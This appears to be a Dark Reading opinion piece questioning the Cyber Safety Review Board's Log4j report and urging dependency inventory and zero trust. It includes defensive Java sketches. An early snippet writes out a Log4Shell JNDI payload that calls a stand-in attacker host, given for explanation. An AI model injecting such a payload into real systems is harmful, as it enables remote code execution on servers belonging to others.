Don't Take the Cyber Safety Review Board's Log4j Report at Face Value

Given the lack of reporting requirements, the findings are more like assumptions. Here’s what organizations can do to minimize exposure.

DARKReading

The most significant finding in the Cyber Safety Review Board’s voluminous analysis of the Log4j vulnerability is what it didn’t observe.

The board is “not aware of any significant Log4j-based attacks on critical infrastructure systems.” Also, “exploitation of Log4j occurred at lower levels than many experts predicted, given the severity of the vulnerability.” That’s remarkable, since the Log4j flaw is one of the most severe vulnerabilities of the past decade.
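To see why expectations were so dire, consider how little it takes to trigger the flaw (CVE-2021-44228, better known as Log4Shell). Here is a minimal sketch, assuming a vulnerable log4j-core (2.0-beta9 through 2.14.1) on the classpath; the attacker host is purely illustrative:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Minimal illustration of the Log4Shell pattern (CVE-2021-44228).
// With a vulnerable log4j-core on the classpath, logging
// attacker-controlled input triggers a JNDI lookup against the
// attacker's server and, depending on JVM settings, remote class loading.
public class Log4ShellDemo {
    private static final Logger LOG = LogManager.getLogger(Log4ShellDemo.class);

    public static void main(String[] args) {
        // In a real application this value arrives in a request header,
        // form field, or user-agent string: anywhere user input gets logged.
        String userInput = "${jndi:ldap://attacker.example.com/a}";

        // This innocuous-looking call is the entire attack surface;
        // vulnerable versions resolve the ${jndi:...} token on write.
        LOG.error("Failed login for user: {}", userInput);
    }
}
```

No memory corruption, no malformed packet, just a log line. That is what made the vulnerability so easy to exploit at scale.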

Given how widely the library is used, it’s difficult to accept that a vulnerability this pervasive, one the board itself deemed “endemic,” caused no real damage to critical infrastructure. The report’s finding of no significant incidents is no reason to drop our guard, however. In fact, we need to be more vigilant than ever.

The report acknowledges that unlike, say, government agencies reviewing transportation disasters, there was “no crash site or damaged vehicle to inspect, no stress tests to perform on failed equipment, and no wiring diagrams to review.” And since critical infrastructure owners and operators were not yet required to report breaches to the federal government, there’s a significant blind spot. The findings in the report are just assumptions, and organizations should not feel comforted by them.

Log4j remains deeply embedded in systems everywhere; it’s one of the few pieces of software that popular projects such as Apache Struts, Elasticsearch, and Kafka have in common. We’re also told that during the board’s review, community stakeholders identified “new compromises, new threat actors, and new learnings.”

Some of this reflects the democratization of software development. That’s a good thing, but we need to remember that as long as we have software, we’ll have software vulnerabilities.

Knowing Every Link in the Chain

Guarding against weak links in the software supply chain requires adequate knowledge of every link in the chain, an elusive goal. Most organizations have terrible asset management practices, and it’s impossible to secure the technologies in an infrastructure when no one is sure what they are, where they reside, or how they’re used.

There are always new tools and capabilities coming down the pike, and with cloud applications, it’s even worse. For homegrown applications in the cloud, developers typically don’t see it as their responsibility to track which software components are in the mix. Their focus is on output, not sourcing. And with software-as-a-service (SaaS) applications, there’s a near-total dependence on the third-party vendor doing the right thing.

Even without consequences we can point to, Log4j offers further proof that software supply chain security is fundamentally broken.

What to Do Next

So what can we do to fix it? The CSRB report serves up recommendations rich with anecdotes. They’re well-meaning but too opaque for companies to implement in real-world settings. For example, we’re told that “organizations should be prepared to address Log4j vulnerabilities for years to come.” But how?

There are steps organizations can take. Again, there are no guarantees — foolproof protection is impossible. But the dangers can be contained and minimized.

First, organizations need greater awareness of all technologies in use; asset management is useless without an up-to-date asset inventory. This is an ongoing priority, and it requires developer buy-in. Almost every business uses open source software, so the inventory must extend down to the dependency level. This isn’t sexy, but it may be one of the most essential activities to carry out effectively.
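What does dependency-level inventory look like in practice? Below is a minimal sketch, not a substitute for real SBOM tooling such as CycloneDX or Syft, that walks a directory tree and flags any JAR bundling log4j-core, including copies repackaged into “fat” application JARs that a filename check would miss:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.jar.JarFile;
import java.util.stream.Stream;

// Sketch of dependency-level inventory: find every JAR under a root
// directory and report any that embeds log4j-core classes. It looks
// inside each artifact because Log4j is often repackaged ("shaded")
// into application JARs whose names never mention it.
public class Log4jInventory {
    public static void main(String[] args) throws IOException {
        Path root = Paths.get(args.length > 0 ? args[0] : ".");
        try (Stream<Path> files = Files.walk(root)) {
            files.filter(p -> p.toString().endsWith(".jar"))
                 .forEach(Log4jInventory::inspect);
        }
    }

    private static void inspect(Path jarPath) {
        try (JarFile jar = new JarFile(jarPath.toFile())) {
            // JndiLookup.class is the class behind the Log4Shell lookup;
            // its presence flags an embedded log4j-core, shaded or not.
            boolean hasJndiLookup = jar.stream().anyMatch(e ->
                    e.getName().endsWith("core/lookup/JndiLookup.class"));
            if (hasJndiLookup) {
                System.out.println("log4j-core found in: " + jarPath);
            }
        } catch (IOException e) {
            System.err.println("Skipping unreadable JAR: " + jarPath);
        }
    }
}
```

A real inventory also has to handle nested archives (WARs, EARs, Spring Boot fat JARs) and feed its findings into a living asset database, which is exactly the ongoing, developer-driven work described above.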

Developers and their software are one thing, but in every enterprise, business users now deploy the apps they believe are best for getting the job done. Employers are understandably concerned about security and compliance, but heavy-handed enforcement (i.e., attempting to block access) is a losing proposition for everyone. Employee application choice and enterprise security are not mutually exclusive; with the technologies now available, they go hand in hand.

In the past, we’d have called this unsanctioned use of applications shadow IT, but now there’s a better term: unmanageable applications. They’re very common and easy to spot because they don’t support identity and security standards. IT-authorized applications are hard enough to police; unmanageable applications are an even bigger challenge.

Second, we need to move toward zero-trust architecture. The concept is getting plenty of buzz, but implementing it requires multiple layers of controls, and unmanageable applications pose a particular problem: because they don’t support industry standards such as SAML (for authentication) and SCIM (for adding and removing users), they can’t be added to a zero-trust protected surface the way standards-compliant apps can. A fundamental zero-trust principle is defining who can access each data, application, asset, or service (DAAS) element, and that definition must cover all business apps, including the unmanageable ones, not only those that support the standards.
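To make the SCIM point concrete, here is a sketch of the deprovisioning hook a standards-compliant application exposes and an unmanageable one does not. The endpoint shape comes from SCIM 2.0 (RFC 7644); the base URL, bearer token, and user ID below are placeholders:

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

// Sketch of SCIM-based deprovisioning: an identity provider (or a
// script like this one) deletes a user the moment they leave, using
// the standard /Users/{id} resource defined by RFC 7644. Without SCIM
// support there is no such hook, and offboarding becomes manual.
public class ScimDeprovision {
    public static void main(String[] args) throws Exception {
        String baseUrl = "https://app.example.com/scim/v2"; // placeholder tenant
        String userId = "2819c223-7f76-453a-919d-413861904646"; // example ID from the RFC

        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create(baseUrl + "/Users/" + userId))
                .header("Authorization", "Bearer <token>") // placeholder credential
                .DELETE()
                .build();

        HttpResponse<Void> response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.discarding());

        // RFC 7644 specifies 204 No Content on successful deletion.
        System.out.println("SCIM delete returned HTTP " + response.statusCode());
    }
}
```

An application that can’t answer this call, or the SAML handshake that precedes it, is one your zero-trust controls can’t see, which is why such apps demand compensating measures rather than exclusion from the strategy.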

We can’t be sure we dodged a bullet with Log4j, and more zero-days are on the way. The CSRB report should serve as a wake-up call for organizations worldwide to dig deeper into the software supply chain behind all of their applications. Physical supply chains have long received this kind of scrutiny; software deserves the same.
